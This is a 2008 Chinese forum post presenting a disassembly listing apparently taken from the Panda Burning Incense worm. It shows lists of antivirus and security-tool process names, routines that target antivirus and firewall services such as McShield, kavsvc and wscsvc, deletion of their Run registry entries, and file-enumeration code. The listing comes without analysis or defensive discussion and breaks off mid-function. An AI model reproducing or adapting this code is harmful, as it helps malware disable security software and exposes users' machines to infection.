[原创] 病毒代码——熊猫烧香核心代码

gaoyoo

学前班

帖子: 46
精华: 0
威望: 0 度
金币: 16 枚
最后登录: 2008-8-6

11^# 大中小发表于 2008-6-6 08:28 只看该作者

00406C2B    00          DB 00
00406C2C    CA          DB CA
00406C2D    C9          DB C9
00406C2E    BE          DB BE
00406C2F    FA          DB FA
00406C30    CC          INT3
00406C31    E5          DB E5
00406C32    00          DB 00
00406C33    00          DB 00
00406C34    FF          DB FF
00406C35    FF          DB FF
00406C36    FF          DB FF
00406C37    FF          DB FF
00406C38    0E          DB 0E
00406C39    00          DB 00
00406C3A    00          DB 00
00406C3B    00          DB 00
00406C3C    C4          DB C4
00406C3D    BE          DB BE
00406C3E    C2          DB C2
00406C3F    ED          DB ED
00406C40    B8          DB B8
00406C41    A8          DB A8
00406C42    D6          DB D6
00406C43    FA          DB FA
00406C44    B2          DB B2
00406C45    E9          DB E9
00406C46    D5          DB D5
00406C47    D2          DB D2
00406C48    C6          DB C6
00406C49    F7          DB F7
00406C4A    00          DB 00
00406C4B    00          DB 00
00406C4C .  FFFFFFFF    DD FFFFFFFF
00406C50 .  15000000    DD 00000015
00406C54 .  53 79 73 74 6>ASCII "System Safety Mo"
00406C64 .  6E 69 74 6F 7>ASCII "nitor",0
00406C6A    00          DB 00
00406C6B    00          DB 00
00406C6C .  FFFFFFFF    DD FFFFFFFF
00406C70 .  13000000    DD 00000013
00406C74 .  57 72 61 70 7>ASCII "Wrapped gift Kil"
00406C84 .  6C 65 72 00 ASCII "ler",0
00406C88 .  FFFFFFFF    DD FFFFFFFF
00406C8C .  0E000000    DD 0000000E
00406C90 .  57 69 6E 73 6>ASCII "Winsock Expert",0
00406C9F    00          DB 00
00406CA0    FF          DB FF
00406CA1    FF          DB FF
00406CA2    FF          DB FF
00406CA3    FF          DB FF
00406CA4    10          DB 10
00406CA5    00          DB 00
00406CA6    00          DB 00
00406CA7    00          DB 00
00406CA8    D3          DB D3
00406CA9    CE          DB CE
00406CAA    CF          DB CF
00406CAB    B7          DB B7
00406CAC    C4          DB C4
00406CAD    BE          DB BE
00406CAE    C2          DB C2
00406CAF    ED          DB ED
00406CB0    BC          DB BC
00406CB1    EC          DB EC
00406CB2    B2          DB B2
00406CB3    E2          DB E2
00406CB4    B4          DB B4
00406CB5    F3          DB F3
00406CB6    CA          DB CA
00406CB7    A6          DB A6
00406CB8    00          DB 00
00406CB9    00          DB 00
00406CBA    00          DB 00
00406CBB    00          DB 00
00406CBC    FF          DB FF
00406CBD    FF          DB FF
00406CBE    FF          DB FF
00406CBF    FF          DB FF
00406CC0    08          DB 08
00406CC1    00          DB 00
00406CC2    00          DB 00
00406CC3    00          DB 00
00406CC4    B3          DB B3
00406CC5    AC          DB AC
00406CC6    BC          DB BC
00406CC7    B6          DB B6
00406CC8    D1          DB D1
00406CC9    B2          DB B2
00406CCA    BE          DB BE
00406CCB    AF          DB AF
00406CCC    00          DB 00
00406CCD    00          DB 00
00406CCE    00          DB 00
00406CCF    00          DB 00
00406CD0 .  6D 73 63 74 6>ASCII "msctls_statusbar"
00406CE0 .  33 32 00    ASCII "32",0
00406CE3    00          DB 00
00406CE4 .  FFFFFFFF    DD FFFFFFFF
00406CE8 .  09000000    DD 00000009
00406CEC .  70 6A 66 28 7>ASCII "pjf(ustc)",0
00406CF6    00          DB 00
00406CF7    00          DB 00
00406CF8 .  49 63 65 53 7>ASCII "IceSword",0
00406D01    00          DB 00
00406D02    00          DB 00
00406D03    00          DB 00
00406D04 .  FFFFFFFF    DD FFFFFFFF
00406D08 .  0C000000    DD 0000000C
00406D0C .  4D 63 73 68 6>ASCII "Mcshield.exe",0
00406D19    00          DB 00
00406D1A    00          DB 00
00406D1B    00          DB 00
00406D1C .  FFFFFFFF    DD FFFFFFFF
00406D20 .  0C000000    DD 0000000C
00406D24 .  56 73 54 73 6>ASCII "VsTskMgr.exe",0
00406D31    00          DB 00
00406D32    00          DB 00
00406D33    00          DB 00
00406D34 .  FFFFFFFF    DD FFFFFFFF
00406D38 .  0C000000    DD 0000000C
00406D3C .  6E 61 50 72 6>ASCII "naPrdMgr.exe",0
00406D49    00          DB 00
00406D4A    00          DB 00
00406D4B    00          DB 00
00406D4C .  FFFFFFFF    DD FFFFFFFF
00406D50 .  0D000000    DD 0000000D
00406D54 .  55 70 64 61 7>ASCII "UpdaterUI.exe",0
00406D62    00          DB 00
00406D63    00          DB 00
00406D64 .  FFFFFFFF    DD FFFFFFFF
00406D68 .  09000000    DD 00000009
00406D6C .  54 42 4D 6F 6>ASCII "TBMon.exe",0
00406D76    00          DB 00
00406D77    00          DB 00
00406D78 .  FFFFFFFF    DD FFFFFFFF
00406D7C .  0A000000    DD 0000000A
00406D80 .  73 63 61 6E 3>ASCII "scan32.exe",0
00406D8B    00          DB 00
00406D8C .  FFFFFFFF    DD FFFFFFFF
00406D90 .  0B000000    DD 0000000B
00406D94 .  52 61 76 6D 6>ASCII "Ravmond.exe",0
00406DA0 .  FFFFFFFF    DD FFFFFFFF
00406DA4 .  0B000000    DD 0000000B
00406DA8 .  43 43 65 6E 7>ASCII "CCenter.exe",0
00406DB4 .  FFFFFFFF    DD FFFFFFFF
00406DB8 .  0B000000    DD 0000000B
00406DBC .  52 61 76 54 6>ASCII "RavTask.exe",0
00406DC8 .  FFFFFFFF    DD FFFFFFFF
00406DCC .  07000000    DD 00000007
00406DD0 .  52 61 76 2E 6>ASCII "Rav.exe",0
00406DD8 .  FFFFFFFF    DD FFFFFFFF
00406DDC .  0A000000    DD 0000000A
00406DE0 .  52 61 76 6D 6>ASCII "Ravmon.exe",0
00406DEB    00          DB 00
00406DEC .  FFFFFFFF    DD FFFFFFFF
00406DF0 .  0B000000    DD 0000000B
00406DF4 .  52 61 76 6D 6>ASCII "RavmonD.exe",0
00406E00 .  FFFFFFFF    DD FFFFFFFF
00406E04 .  0B000000    DD 0000000B
00406E08 .  52 61 76 53 7>ASCII "RavStub.exe",0
00406E14 .  FFFFFFFF    DD FFFFFFFF
00406E18 .  08000000    DD 00000008
00406E1C .  4B 56 58 50 2>ASCII "KVXP.kxp",0
00406E25    00          DB 00
00406E26    00          DB 00
00406E27    00          DB 00
00406E28 .  FFFFFFFF    DD FFFFFFFF
00406E2C .  0B000000    DD 0000000B
00406E30 .  4B 76 4D 6F 6>ASCII "KvMonXP.kxp",0
00406E3C .  FFFFFFFF    DD FFFFFFFF
00406E40 .  0C000000    DD 0000000C
00406E44 .  4B 56 43 65 6>ASCII "KVCenter.kxp",0
00406E51    00          DB 00
00406E52    00          DB 00
00406E53    00          DB 00
00406E54 .  FFFFFFFF    DD FFFFFFFF
00406E58 .  0B000000    DD 0000000B
00406E5C .  4B 56 53 72 7>ASCII "KVSrvXP.exe",0
00406E68 .  FFFFFFFF    DD FFFFFFFF
00406E6C .  0A000000    DD 0000000A
00406E70 .  4B 52 65 67 4>ASCII "KRegEx.exe",0
00406E7B    00          DB 00
00406E7C .  FFFFFFFF    DD FFFFFFFF
00406E80 .  0A000000    DD 0000000A
00406E84 .  55 49 48 6F 7>ASCII "UIHost.exe",0
00406E8F    00          DB 00
00406E90 .  FFFFFFFF    DD FFFFFFFF
00406E94 .  0B000000    DD 0000000B
00406E98 .  54 72 6F 6A 4>ASCII "TrojDie.kxp",0
00406EA4 .  FFFFFFFF    DD FFFFFFFF
00406EA8 .  0D000000    DD 0000000D
00406EAC .  46 72 6F 67 4>ASCII "FrogAgent.exe",0
00406EBA    00          DB 00
00406EBB    00          DB 00
00406EBC .  FFFFFFFF    DD FFFFFFFF
00406EC0 .  0A000000    DD 0000000A
00406EC4 .  4C 6F 67 6F 3>ASCII "Logo1_.exe",0
00406ECF    00          DB 00
00406ED0 .  FFFFFFFF    DD FFFFFFFF
00406ED4 .  0A000000    DD 0000000A
00406ED8 .  4C 6F 67 6F 5>ASCII "Logo_1.exe",0
00406EE3    00          DB 00
00406EE4 .  FFFFFFFF    DD FFFFFFFF
00406EE8 .  0C000000    DD 0000000C
00406EEC .  52 75 6E 64 6>ASCII "Rundl132.exe",0
00406EF9    00          DB 00
00406EFA    00          DB 00
00406EFB    00          DB 00
00406EFC .  FFFFFFFF    DD FFFFFFFF
00406F00 .  0B000000    DD 0000000B
00406F04 .  72 65 67 65 6>ASCII "regedit.exe",0
00406F10 .  FFFFFFFF    DD FFFFFFFF
00406F14 .  0C000000    DD 0000000C
00406F18 .  6D 73 63 6F 6>ASCII "msconfig.exe",0
00406F25    00          DB 00
00406F26    00          DB 00
00406F27    00          DB 00
00406F28 .  FFFFFFFF    DD FFFFFFFF
00406F2C .  0B000000    DD 0000000B
00406F30 .  74 61 73 6B 6>ASCII "taskmgr.exe",0
00406F3C  /$  51          PUSH ECX
00406F3D  |.  54          PUSH ESP                               ; /pThreadId
00406F3E  |.  6A 00       PUSH 0                                  ; |CreationFlags = 0
00406F40  |.  6A 00       PUSH 0                                  ; |pThreadParm = NULL
00406F42  |.  68 C8624000 PUSH setup_un.004062C8                ; |ThreadFunction = setup_un.004062C8
00406F47  |.  6A 00       PUSH 0                                  ; |StackSize = 0
00406F49  |.  6A 00       PUSH 0                                  ; |pSecurity = NULL
00406F4B  |.  E8 ACDBFFFF CALL <JMP.&kernel32.CreateThread>       ; \CreateThread
00406F50  |.  5A          POP EDX
00406F51  \.  C3          RETN
00406F52    8BC0       MOV EAX,EAX
00406F54 .  B8 24714000 MOV EAX,setup_un.00407124             ;  schedule
00406F59 .  E8 6EEDFFFF CALL setup_un.00405CCC
00406F5E .  B8 38714000 MOV EAX,setup_un.00407138             ;  sharedaccess
00406F63 .  E8 64EDFFFF CALL setup_un.00405CCC
00406F68 .  B8 50714000 MOV EAX,setup_un.00407150             ;  rsccenter
00406F6D .  E8 5AEDFFFF CALL setup_un.00405CCC
00406F72 .  B8 64714000 MOV EAX,setup_un.00407164             ;  rsravmon
00406F77 .  E8 50EDFFFF CALL setup_un.00405CCC
00406F7C .  B8 70714000 MOV EAX,setup_un.00407170             ;  rsccenter
00406F81 .  E8 CAEDFFFF CALL setup_un.00405D50
00406F86 .  B8 7C714000 MOV EAX,setup_un.0040717C             ;  rsravmon
00406F8B .  E8 C0EDFFFF CALL setup_un.00405D50
00406F90 .  BA 90714000 MOV EDX,setup_un.00407190             ;  software\microsoft\windows\currentversion\run\ravtask
00406F95 .  B8 02000080 MOV EAX,80000002
00406F9A .  E8 C1EBFFFF CALL setup_un.00405B60
00406F9F .  B8 D0714000 MOV EAX,setup_un.004071D0             ;  kvwsc
00406FA4 .  E8 23EDFFFF CALL setup_un.00405CCC
00406FA9 .  B8 E0714000 MOV EAX,setup_un.004071E0             ;  kvsrvxp
00406FAE .  E8 19EDFFFF CALL setup_un.00405CCC
00406FB3 .  B8 E8714000 MOV EAX,setup_un.004071E8             ;  kvwsc
00406FB8 .  E8 93EDFFFF CALL setup_un.00405D50
00406FBD .  B8 F0714000 MOV EAX,setup_un.004071F0             ;  kvsrvxp
00406FC2 .  E8 89EDFFFF CALL setup_un.00405D50
00406FC7 .  BA 00724000 MOV EDX,setup_un.00407200             ;  software\microsoft\windows\currentversion\run\kvmonxp
00406FCC .  B8 02000080 MOV EAX,80000002
00406FD1 .  E8 8AEBFFFF CALL setup_un.00405B60
00406FD6 .  B8 40724000 MOV EAX,setup_un.00407240             ;  kavsvc
00406FDB .  E8 ECECFFFF CALL setup_un.00405CCC
00406FE0 .  B8 50724000 MOV EAX,setup_un.00407250             ;  avp
00406FE5 .  E8 E2ECFFFF CALL setup_un.00405CCC
00406FEA .  B8 54724000 MOV EAX,setup_un.00407254             ;  avp
00406FEF .  E8 5CEDFFFF CALL setup_un.00405D50
00406FF4 .  B8 58724000 MOV EAX,setup_un.00407258             ;  kavsvc
00406FF9 .  E8 52EDFFFF CALL setup_un.00405D50
00406FFE .  BA 68724000 MOV EDX,setup_un.00407268             ;  software\microsoft\windows\currentversion\run\kav
00407003 .  B8 02000080 MOV EAX,80000002
00407008 .  E8 53EBFFFF CALL setup_un.00405B60
0040700D .  BA A4724000 MOV EDX,setup_un.004072A4             ;  software\microsoft\windows\currentversion\run\kavpersonal50
00407012 .  B8 02000080 MOV EAX,80000002
00407017 .  E8 44EBFFFF CALL setup_un.00405B60
0040701C .  B8 E8724000 MOV EAX,setup_un.004072E8             ;  mcafeeframework
00407021 .  E8 A6ECFFFF CALL setup_un.00405CCC
00407026 .  B8 00734000 MOV EAX,setup_un.00407300             ;  mcshield
0040702B .  E8 9CECFFFF CALL setup_un.00405CCC
00407030 .  B8 14734000 MOV EAX,setup_un.00407314             ;  mctaskmanager
00407035 .  E8 92ECFFFF CALL setup_un.00405CCC
0040703A .  B8 24734000 MOV EAX,setup_un.00407324             ;  mcafeeframework
0040703F .  E8 0CEDFFFF CALL setup_un.00405D50
00407044 .  B8 34734000 MOV EAX,setup_un.00407334             ;  mcshield
00407049 .  E8 02EDFFFF CALL setup_un.00405D50
0040704E .  B8 40734000 MOV EAX,setup_un.00407340             ;  mctaskmanager
00407053 .  E8 F8ECFFFF CALL setup_un.00405D50
00407058 .  BA 58734000 MOV EDX,setup_un.00407358             ;  software\microsoft\windows\currentversion\run\mcafeeupdaterui
0040705D .  B8 02000080 MOV EAX,80000002
00407062 .  E8 F9EAFFFF CALL setup_un.00405B60
00407067 .  BA A0734000 MOV EDX,setup_un.004073A0             ;  software\microsoft\windows\currentversion\run\network associates error reporting service
0040706C .  B8 02000080 MOV EAX,80000002
00407071 .  E8 EAEAFFFF CALL setup_un.00405B60
00407076 .  BA 04744000 MOV EDX,setup_un.00407404             ;  software\microsoft\windows\currentversion\run\shstatexe
0040707B .  B8 02000080 MOV EAX,80000002
00407080 .  E8 DBEAFFFF CALL setup_un.00405B60
00407085 .  B8 3C744000 MOV EAX,setup_un.0040743C             ;  navapsvc
0040708A .  E8 C1ECFFFF CALL setup_un.00405D50
0040708F .  B8 48744000 MOV EAX,setup_un.00407448             ;  wscsvc
00407094 .  E8 B7ECFFFF CALL setup_un.00405D50
00407099 .  B8 50744000 MOV EAX,setup_un.00407450             ;  kpfwsvc
0040709E .  E8 ADECFFFF CALL setup_un.00405D50
004070A3 .  B8 58744000 MOV EAX,setup_un.00407458             ;  sndsrvc
004070A8 .  E8 A3ECFFFF CALL setup_un.00405D50
004070AD .  B8 60744000 MOV EAX,setup_un.00407460             ;  ccproxy
004070B2 .  E8 99ECFFFF CALL setup_un.00405D50
004070B7 .  B8 68744000 MOV EAX,setup_un.00407468             ;  ccevtmgr
004070BC .  E8 8FECFFFF CALL setup_un.00405D50
004070C1 .  B8 74744000 MOV EAX,setup_un.00407474             ;  ccsetmgr
004070C6 .  E8 85ECFFFF CALL setup_un.00405D50
004070CB .  B8 80744000 MOV EAX,setup_un.00407480             ;  spbbcsvc
004070D0 .  E8 7BECFFFF CALL setup_un.00405D50
004070D5 .  B8 8C744000 MOV EAX,setup_un.0040748C             ;  symantec core lc
004070DA .  E8 71ECFFFF CALL setup_un.00405D50
004070DF .  B8 A0744000 MOV EAX,setup_un.004074A0             ;  npfmntor
004070E4 .  E8 67ECFFFF CALL setup_un.00405D50
004070E9 .  B8 AC744000 MOV EAX,setup_un.004074AC             ;  mskservice
004070EE .  E8 5DECFFFF CALL setup_un.00405D50
004070F3 .  B8 B8744000 MOV EAX,setup_un.004074B8             ;  firesvc
004070F8 .  E8 53ECFFFF CALL setup_un.00405D50
004070FD .  BA C8744000 MOV EDX,setup_un.004074C8             ;  software\microsoft\windows\currentversion\run\ylive.exe
00407102 .  B8 02000080 MOV EAX,80000002
00407107 .  E8 54EAFFFF CALL setup_un.00405B60
0040710C .  BA 08754000 MOV EDX,setup_un.00407508             ;  software\microsoft\windows\currentversion\run\yassistse
00407111 .  B8 02000080 MOV EAX,80000002
00407116 .  E8 45EAFFFF CALL setup_un.00405B60
0040711B .  C3          RETN
0040711C .  FFFFFFFF    DD FFFFFFFF
00407120 .  08000000    DD 00000008
00407124 .  53 63 68 65 6>ASCII "Schedule",0
0040712D    00          DB 00
0040712E    00          DB 00
0040712F    00          DB 00
00407130 .  FFFFFFFF    DD FFFFFFFF
00407134 .  0C000000    DD 0000000C
00407138 .  73 68 61 72 6>ASCII "sharedaccess",0
00407145    00          DB 00
00407146    00          DB 00
00407147    00          DB 00
00407148 .  FFFFFFFF    DD FFFFFFFF
0040714C .  09000000    DD 00000009
00407150 .  52 73 43 43 6>ASCII "RsCCenter",0
0040715A    00          DB 00
0040715B    00          DB 00
0040715C .  FFFFFFFF    DD FFFFFFFF
00407160 .  08000000    DD 00000008
00407164 .  52 73 52 61 7>ASCII "RsRavMon",0
0040716D    00          DB 00
0040716E    00          DB 00
0040716F    00          DB 00
00407170 .  52 73 43 43 6>ASCII "RsCCenter",0
0040717A    00          DB 00
0040717B    00          DB 00
0040717C .  52 73 52 61 7>ASCII "RsRavMon",0
00407185    00          DB 00
00407186    00          DB 00
00407187    00          DB 00
00407188 .  FFFFFFFF    DD FFFFFFFF
0040718C .  35000000    DD 00000035
00407190 .  53 4F 46 54 5>ASCII "SOFTWARE\Microso"
004071A0 .  66 74 5C 57 6>ASCII "ft\Windows\Curre"
004071B0 .  6E 74 56 65 7>ASCII "ntVersion\Run\Ra"
004071C0 .  76 54 61 73 6>ASCII "vTask",0
004071C6    00          DB 00
004071C7    00          DB 00
004071C8 .  FFFFFFFF    DD FFFFFFFF
004071CC .  05000000    DD 00000005
004071D0 .  4B 56 57 53 4>ASCII "KVWSC",0
004071D6    00          DB 00
004071D7    00          DB 00
004071D8 .  FFFFFFFF    DD FFFFFFFF
004071DC .  07000000    DD 00000007
004071E0 .  4B 56 53 72 7>ASCII "KVSrvXP",0
004071E8 .  4B 56 57 53 4>ASCII "KVWSC",0
004071EE    00          DB 00
004071EF    00          DB 00
004071F0 .  4B 56 53 72 7>ASCII "KVSrvXP",0
004071F8 .  FFFFFFFF    DD FFFFFFFF
004071FC .  35000000    DD 00000035
00407200 .  53 4F 46 54 5>ASCII "SOFTWARE\Microso"
00407210 .  66 74 5C 57 6>ASCII "ft\Windows\Curre"
00407220 .  6E 74 56 65 7>ASCII "ntVersion\Run\Kv"
00407230 .  4D 6F 6E 58 5>ASCII "MonXP",0
00407236    00          DB 00
00407237    00          DB 00
00407238 .  FFFFFFFF    DD FFFFFFFF
0040723C .  06000000    DD 00000006
00407240 .  6B 61 76 73 7>ASCII "kavsvc",0
00407247    00          DB 00
00407248 .  FFFFFFFF    DD FFFFFFFF
0040724C .  03000000    DD 00000003
00407250 .  41 56 50 00 ASCII "AVP",0
00407254 .  41 56 50 00 ASCII "AVP",0
00407258 .  6B 61 76 73 7>ASCII "kavsvc",0
0040725F    00          DB 00
00407260 .  FFFFFFFF    DD FFFFFFFF
00407264 .  31000000    DD 00000031
00407268 .  53 4F 46 54 5>ASCII "SOFTWARE\Microso"
00407278 .  66 74 5C 57 6>ASCII "ft\Windows\Curre"
00407288 .  6E 74 56 65 7>ASCII "ntVersion\Run\ka"
00407298 .  76 00       ASCII "v",0
0040729A    00          DB 00
0040729B    00          DB 00
0040729C .  FFFFFFFF    DD FFFFFFFF
004072A0 .  3B000000    DD 0000003B
004072A4 .  53 4F 46 54 5>ASCII "SOFTWARE\Microso"
004072B4 .  66 74 5C 57 6>ASCII "ft\Windows\Curre"
004072C4 .  6E 74 56 65 7>ASCII "ntVersion\Run\KA"
004072D4 .  56 50 65 72 7>ASCII "VPersonal50",0
004072E0 .  FFFFFFFF    DD FFFFFFFF
004072E4 .  0F000000    DD 0000000F
004072E8 .  4D 63 41 66 6>ASCII "McAfeeFramework",0
004072F8 .  FFFFFFFF    DD FFFFFFFF
004072FC .  08000000    DD 00000008
00407300 .  4D 63 53 68 6>ASCII "McShield",0
00407309    00          DB 00
0040730A    00          DB 00
0040730B    00          DB 00
0040730C .  FFFFFFFF    DD FFFFFFFF
00407310 .  0D000000    DD 0000000D
00407314 .  4D 63 54 61 7>ASCII "McTaskManager",0
00407322    00          DB 00
00407323    00          DB 00
00407324 .  4D 63 41 66 6>ASCII "McAfeeFramework",0
00407334 .  4D 63 53 68 6>ASCII "McShield",0
0040733D    00          DB 00
0040733E    00          DB 00
0040733F    00          DB 00
00407340 .  4D 63 54 61 7>ASCII "McTaskManager",0
0040734E    00          DB 00
0040734F    00          DB 00
00407350 .  FFFFFFFF    DD FFFFFFFF
00407354 .  3D000000    DD 0000003D
00407358 .  53 4F 46 54 5>ASCII "SOFTWARE\Microso"
00407368 .  66 74 5C 57 6>ASCII "ft\Windows\Curre"
00407378 .  6E 74 56 65 7>ASCII "ntVersion\Run\Mc"
00407388 .  41 66 65 65 5>ASCII "AfeeUpdaterUI",0
00407396    00          DB 00
00407397    00          DB 00
00407398 .  FFFFFFFF    DD FFFFFFFF
0040739C .  58000000    DD 00000058
004073A0 .  53 4F 46 54 5>ASCII "SOFTWARE\Microso"
004073B0 .  66 74 5C 57 6>ASCII "ft\Windows\Curre"
004073C0 .  6E 74 56 65 7>ASCII "ntVersion\Run\Ne"
004073D0 .  74 77 6F 72 6>ASCII "twork Associates"
004073E0 .  20 45 72 72 6>ASCII " Error Reporting"
004073F0 .  20 53 65 72 7>ASCII " Service",0
004073F9    00          DB 00
004073FA    00          DB 00
004073FB    00          DB 00
004073FC .  FFFFFFFF    DD FFFFFFFF
00407400 .  37000000    DD 00000037
00407404 .  53 4F 46 54 5>ASCII "SOFTWARE\Microso"
00407414 .  66 74 5C 57 6>ASCII "ft\Windows\Curre"
00407424 .  6E 74 56 65 7>ASCII "ntVersion\Run\Sh"
00407434 .  53 74 61 74 4>ASCII "StatEXE",0
0040743C .  6E 61 76 61 7>ASCII "navapsvc",0
00407445    00          DB 00
00407446    00          DB 00
00407447    00          DB 00
00407448 .  77 73 63 73 7>ASCII "wscsvc",0
0040744F    00          DB 00
00407450 .  4B 50 66 77 5>ASCII "KPfwSvc",0
00407458 .  53 4E 44 53 7>ASCII "SNDSrvc",0
00407460 .  63 63 50 72 6>ASCII "ccProxy",0
00407468 .  63 63 45 76 7>ASCII "ccEvtMgr",0
00407471    00          DB 00
00407472    00          DB 00
00407473    00          DB 00
00407474 .  63 63 53 65 7>ASCII "ccSetMgr",0
0040747D    00          DB 00
0040747E    00          DB 00
0040747F    00          DB 00
00407480 .  53 50 42 42 4>ASCII "SPBBCSvc",0
00407489    00          DB 00
0040748A    00          DB 00
0040748B    00          DB 00
0040748C .  53 79 6D 61 6>ASCII "Symantec Core LC"
0040749C .  00          ASCII 0
0040749D    00          DB 00
0040749E    00          DB 00
0040749F    00          DB 00
004074A0 .  4E 50 46 4D 6>ASCII "NPFMntor",0
004074A9    00          DB 00
004074AA    00          DB 00
004074AB    00          DB 00
004074AC .  4D 73 6B 53 6>ASCII "MskService",0
004074B7    00          DB 00
004074B8 .  46 69 72 65 5>ASCII "FireSvc",0
004074C0 .  FFFFFFFF    DD FFFFFFFF
004074C4 .  37000000    DD 00000037
004074C8 .  53 4F 46 54 5>ASCII "SOFTWARE\Microso"
004074D8 .  66 74 5C 57 6>ASCII "ft\Windows\Curre"
004074E8 .  6E 74 56 65 7>ASCII "ntVersion\Run\YL"
004074F8 .  69 76 65 2E 6>ASCII "ive.exe",0
00407500 .  FFFFFFFF    DD FFFFFFFF
00407504 .  37000000    DD 00000037
00407508 .  53 4F 46 54 5>ASCII "SOFTWARE\Microso"
00407518 .  66 74 5C 57 6>ASCII "ft\Windows\Curre"
00407528 .  6E 74 56 65 7>ASCII "ntVersion\Run\ya"
00407538 .  73 73 69 73 7>ASCII "ssistse",0
00407540 .  51          PUSH ECX
00407541 .  54          PUSH ESP                               ; /pThreadId
00407542 .  6A 00       PUSH 0                                  ; |CreationFlags = 0
00407544 .  6A 00       PUSH 0                                  ; |pThreadParm = NULL
00407546 .  68 546F4000 PUSH setup_un.00406F54                ; |ThreadFunction = setup_un.00406F54
0040754B .  6A 00       PUSH 0                                  ; |StackSize = 0
0040754D .  6A 00       PUSH 0                                  ; |pSecurity = NULL
0040754F .  E8 A8D5FFFF CALL <JMP.&kernel32.CreateThread>       ; \CreateThread
00407554 .  5A          POP EDX
00407555 .  C3          RETN
00407556    8BC0       MOV EAX,EAX
00407558 .  55          PUSH EBP
00407559 .  8BEC       MOV EBP,ESP
0040755B .  33C0       XOR EAX,EAX
0040755D .  55          PUSH EBP
0040755E .  68 7D754000 PUSH setup_un.0040757D
00407563 .  64:FF30    PUSH DWORD PTR FS:[EAX]
00407566 .  64:8920    MOV DWORD PTR FS:[EAX],ESP
00407569 .  FF05 90F74000 INC DWORD PTR DS:[40F790]
0040756F .  33C0       XOR EAX,EAX
00407571 .  5A          POP EDX
00407572 .  59          POP ECX
00407573 .  59          POP ECX
00407574 .  64:8910    MOV DWORD PTR FS:[EAX],EDX
00407577 .  68 84754000 PUSH setup_un.00407584
0040757C >  C3          RETN                                  ;  RET 用作跳转到 00407584
0040757D .^ E9 E2C0FFFF JMP setup_un.00403664
00407582 .^ EB F8       JMP SHORT setup_un.0040757C
00407584 >  5D          POP EBP
00407585 .  C3          RETN
00407586    8BC0       MOV EAX,EAX
00407588 .  832D 90F74000>SUB DWORD PTR DS:[40F790],1
0040758F .  C3          RETN
00407590    94754000    DD setup_un.00407594
00407594    0A          DB 0A
00407595 .  09          DB 09
00407596 .  54 46 69 6C 6>ASCII "TFileName"
0040759F    90          NOP
004075A0 .  A4754000    DD setup_un.004075A4
004075A4    0E          DB 0E
004075A5 .  0A          DB 0A
004075A6 .  54 53 65 61 7>ASCII "TSearchRec"
004075B0    58          DB 58                                  ;  CHAR 'X'
004075B1    01          DB 01
004075B2    00          DB 00
004075B3    00          DB 00
004075B4    01          DB 01
004075B5    00          DB 00
004075B6    00          DB 00
004075B7    00          DB 00
004075B8    90          NOP
004075B9 .  75 40 00    ASCII "u@",0
004075BC    0C          DB 0C
004075BD    00          DB 00
004075BE    00          DB 00
004075BF    00          DB 00
004075C0  /$  53          PUSH EBX
004075C1  |.  83C4 F8    ADD ESP,-8
004075C4  |.  8BD8       MOV EBX,EAX
004075C6  |.  EB 18       JMP SHORT setup_un.004075E0
004075C8  |>  8D43 18    /LEA EAX,DWORD PTR DS:[EBX+18]
004075CB  |.  50          |PUSH EAX                               ; /pFindFileData
004075CC  |.  8B43 14    |MOV EAX,DWORD PTR DS:[EBX+14]          ; |
004075CF  |.  50          |PUSH EAX                               ; |hFile
004075D0  |.  E8 5FD5FFFF |CALL <JMP.&kernel32.FindNextFileA>    ; \FindNextFileA
004075D5  |.  85C0       |TEST EAX,EAX
004075D7  |.  75 07       |JNZ SHORT setup_un.004075E0
004075D9  |.  E8 7ED5FFFF |CALL <JMP.&kernel32.GetLastError>    ; [GetLastError
004075DE  |.  EB 3F       |JMP SHORT setup_un.0040761F
004075E0  |>  8B43 18       MOV EAX,DWORD PTR DS:[EBX+18]
004075E3  |.  2343 10    |AND EAX,DWORD PTR DS:[EBX+10]
004075E6  |.^ 75 E0       \JNZ SHORT setup_un.004075C8
004075E8  |.  54          PUSH ESP                               ; /pLocalFileTime
004075E9  |.  8D43 2C    LEA EAX,DWORD PTR DS:[EBX+2C]          ; |
004075EC  |.  50          PUSH EAX                               ; |pFileTime
004075ED  |.  E8 2AD5FFFF CALL <JMP.&kernel32.FileTimeToLocalFileT>; \FileTimeToLocalFileTime
004075F2  |.  53          PUSH EBX                               ; /pDOSTime
004075F3  |.  8D43 02    LEA EAX,DWORD PTR DS:[EBX+2]          ; |
004075F6  |.  50          PUSH EAX                               ; |pDOSDate
004075F7  |.  8D4424 08    LEA EAX,DWORD PTR SS:[ESP+8]          ; |
004075FB  |.  50          PUSH EAX                               ; |pFileTime
004075FC  |.  E8 13D5FFFF CALL <JMP.&kernel32.FileTimeToDosDateTim>; \FileTimeToDosDateTime
00407601  |.  8B43 38    MOV EAX,DWORD PTR DS:[EBX+38]
00407604  |.  8943 04    MOV DWORD PTR DS:[EBX+4],EAX
00407607  |.  8B43 18    MOV EAX,DWORD PTR DS:[EBX+18]
0040760A  |.  8943 08    MOV DWORD PTR DS:[EBX+8],EAX
0040760D  |.  8D43 0C    LEA EAX,DWORD PTR DS:[EBX+C]
00407610  |.  8D53 44    LEA EDX,DWORD PTR DS:[EBX+44]
00407613  |.  B9 04010000 MOV ECX,104
00407618  |.  E8 97C8FFFF CALL setup_un.00403EB4
0040761D  |.  33C0       XOR EAX,EAX
0040761F  |>  59          POP ECX
00407620  |.  5A          POP EDX
00407621  |.  5B          POP EBX
00407622  \.  C3          RETN
00407623    90          NOP
00407624  /$  53          PUSH EBX
00407625  |.  8BD8       MOV EBX,EAX
00407627  |.  8B43 14    MOV EAX,DWORD PTR DS:[EBX+14]
0040762A  |.  83F8 FF    CMP EAX,-1
0040762D  |.  74 0D       JE SHORT setup_un.0040763C
0040762F  |.  50          PUSH EAX                               ; /hSearch
00407630  |.  E8 EFD4FFFF CALL <JMP.&kernel32.FindClose>          ; \FindClose
00407635  |.  C743 14 FFFFF>MOV DWORD PTR DS:[EBX+14],-1
0040763C  |>  5B          POP EBX
0040763D  \.  C3          RETN
0040763E    8BC0       MOV EAX,EAX
00407640  /$  53          PUSH EBX
00407641  |.  56          PUSH ESI
00407642  |.  57          PUSH EDI
00407643  |.  8BD9       MOV EBX,ECX
00407645  |.  8BF8       MOV EDI,EAX
00407647  |.  F7D2       NOT EDX
00407649  |.  83E2 1E    AND EDX,1E
0040764C  |.  8953 10    MOV DWORD PTR DS:[EBX+10],EDX
0040764F  |.  8D43 18    LEA EAX,DWORD PTR DS:[EBX+18]
00407652  |.  50          PUSH EAX
00407653  |.  8BC7       MOV EAX,EDI
00407655  |.  E8 72CAFFFF CALL setup_un.004040CC
0040765A  |.  50          PUSH EAX                               ; |FileName
